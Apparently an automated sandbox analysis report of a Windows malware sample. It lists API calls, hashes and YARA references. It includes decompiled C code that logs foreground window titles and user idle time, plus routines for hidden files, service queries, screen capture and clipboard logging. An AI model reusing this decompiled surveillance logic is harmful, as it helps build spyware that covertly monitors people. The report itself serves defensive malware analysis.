                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,00000000), ref: 00411012
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000), ref: 00411022
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 0041102F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007E,?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411050
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 0041105C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411039
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041108C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411096
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002,00000000), ref: 00410FB4
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                          • Part of subcall function 00411927: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                          • Part of subcall function 00411927: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                          • Part of subcall function 00411927: OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                          • Part of subcall function 00411927: CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                          • Part of subcall function 00411927: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,?), ref: 004110F4
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,?), ref: 00411104
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00411111
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 0041111B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007F,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00411132
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 0041113E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041118E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411198
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041121F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411229
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 004112A9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 004112B3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 00411336
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411340
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007A,?,?,?,?,0041B310,00000000), ref: 0041135A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00411371
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000079), ref: 004113AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00000000), ref: 004113BE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??1?$basic_string@$??0?$basic_string@V01@@$G@2@@std@@G@std@@$?length@?$basic_string@$V12@$??4?$basic_string@?c_str@?$basic_string@?substr@?$basic_string@A?$basic_string@OpenServiceV01@$??2@??3@?find@?$basic_string@CloseD@1@@G@1@@HandleManagerV10@
                                        • String ID:
                                        • API String ID: 3693186435-0
                                        • Opcode ID: cdf030826f3260cd6d20b69c12764cebe95a03dce4cc6de715870de60c0c61ee
                                        • Instruction ID: 8efa13a56e58a3380b66c3db6183ea909b867b6e0f3936dc641b94412a702233
                                        • Opcode Fuzzy Hash: cdf030826f3260cd6d20b69c12764cebe95a03dce4cc6de715870de60c0c61ee
                                        • Instruction Fuzzy Hash: E6C1B4B1D101086BDB04B7A2ED56DFF777CEB50304F00481EFA16A71D2EE395A89C66A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004055E7, Relevance: 54.2, APIs: 36, Instructions: 168sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00002710), ref: 00405607
                                          • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                          • Part of subcall function 00405532: CreateFileW.KERNEL32(00000000), ref: 00405569
                                          • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                          • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                          • Part of subcall function 00405532: CloseHandle.KERNEL32(00000000), ref: 004055AE
                                          • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                        • CreateDirectoryW.KERNEL32(00000000), ref: 00405646
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 00405658
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 00405670
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@CloseD@2@@0@DirectoryExistsHandlePathSizeV?$basic_string@Y?$basic_string@
                                        • String ID:
                                        • API String ID: 3042614570-0
                                        • Opcode ID: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                        • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                        • Opcode Fuzzy Hash: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                        • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004059BE, Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 158sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E004059BE(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				intOrPtr _v12;
				signed int _v16;
				char _v28;
				char _v44;
				char _v60;
				char _v76;
				void* _v92;
				intOrPtr _t41;
				int _t43;
				CHAR* _t45;
				signed int _t48;
				char* _t58;
				char* _t59;
				struct HWND__* _t93;
				intOrPtr _t94;
				void* _t99;
				intOrPtr _t112;

				_v12 = __ecx;
				while(1) {
					_t41 = _v12;
					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
						break;
					}
					if(( *0x41b990 & 0x00000001) == 0) {
						 *0x41b990 =  *0x41b990 | 0x00000001;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
						E00413E72(E00405BB5);
					}
					Sleep(0x1f4);
					_t93 = GetForegroundWindow();
					_t43 = GetWindowTextLengthA(_t93);
					_t95 = _t43;
					_t9 = _t95 + 1; // 0x1
					_t45 = _t9;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
					if(_t43 != 0) {
						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						GetWindowTextA(_t93, _t45, _t45);
						_t58 =  &_v44;
						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x41b998);
						if(_t58 == 0) {
							_t59 =  &_v44;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
							_t112 =  *0x41b93e; // 0x0
							if(_t112 == 0) {
								_t103 = _t99 - 0x10;
								L00414176();
								L00414170();
								_t99 = _t99 - 0x10 + 0x18;
								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
							} else {
								_t99 = _t99 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
								E00405DD3(_v12,  &_v44);
							}
						}
					}
					_t94 = _v12;
					_t71 = _t94;
					E00406C35(_t94);
					if(E0041269B(_t94) < 0xea60) {
						L16:
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						continue;
					} else {
						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
							_t48 = E0041269B(_t71);
							if(_t48 < 0xea60) {
								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
								_t101 = _t99 + 0xc - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
								L00414176();
								L00414170();
								_t99 = _t99 + 0xc - 0x10 + 0x18;
								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								goto L16;
							}
							_v16 = _t48;
							Sleep(0x3e8);
						}
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						break;
					}
				}
				return 0;
			}























                                        0x004059c7
                                        0x004059cc
                                        0x004059cc
                                        0x004059d2
                                        0x00000000
                                        0x00000000
                                        0x004059e4
                                        0x004059e6
                                        0x004059f6
                                        0x00405a01
                                        0x00405a06
                                        0x00405a0c
                                        0x00405a18
                                        0x00405a1b
                                        0x00405a21
                                        0x00405a28
                                        0x00405a28
                                        0x00405a2f
                                        0x00405a37
                                        0x00405a40
                                        0x00405a4a
                                        0x00405a52
                                        0x00405a58
                                        0x00405a61
                                        0x00405a6b
                                        0x00405a6d
                                        0x00405a76
                                        0x00405a7f
                                        0x00405a8a
                                        0x00405a90
                                        0x00405a96
                                        0x00405ab5
                                        0x00405ac9
                                        0x00405ad3
                                        0x00405adb
                                        0x00405ade
                                        0x00405ae6
                                        0x00405a98
                                        0x00405a98
                                        0x00405aa1
                                        0x00405aaa
                                        0x00405aaa
                                        0x00405a96
                                        0x00405a6b
                                        0x00405aec
                                        0x00405aef
                                        0x00405af1
                                        0x00405b02
                                        0x00405b97
                                        0x00405b9a
                                        0x00000000
                                        0x00405b08
                                        0x00405b08
                                        0x00405b16
                                        0x00405b1d
                                        0x00405b3d
                                        0x00405b4d
                                        0x00405b5c
                                        0x00405b6c
                                        0x00405b76
                                        0x00405b7b
                                        0x00405b80
                                        0x00405b88
                                        0x00405b91
                                        0x00000000
                                        0x00405b91
                                        0x00405b24
                                        0x00405b27
                                        0x00405b27
                                        0x00405ba8
                                        0x00000000
                                        0x00405ba8
                                        0x00405b02
                                        0x00405bb4

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                        • Sleep.KERNEL32(000001F4), ref: 00405A0C
                                        • GetForegroundWindow.USER32 ref: 00405A12
                                        • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                        • GetWindowTextA.USER32 ref: 00405A52
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                          • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                          • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                        • _itoa.MSVCRT ref: 00405B3D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                        • String ID: [ ${ User has been idle for $ ]$ minutes }
                                        • API String ID: 615312007-3343415809
                                        • Opcode ID: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                        • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                        • Opcode Fuzzy Hash: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                        • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041093F, Relevance: 50.9, APIs: 26, Strings: 3, Instructions: 131fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                          • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                          • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                          • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                          • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                          • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
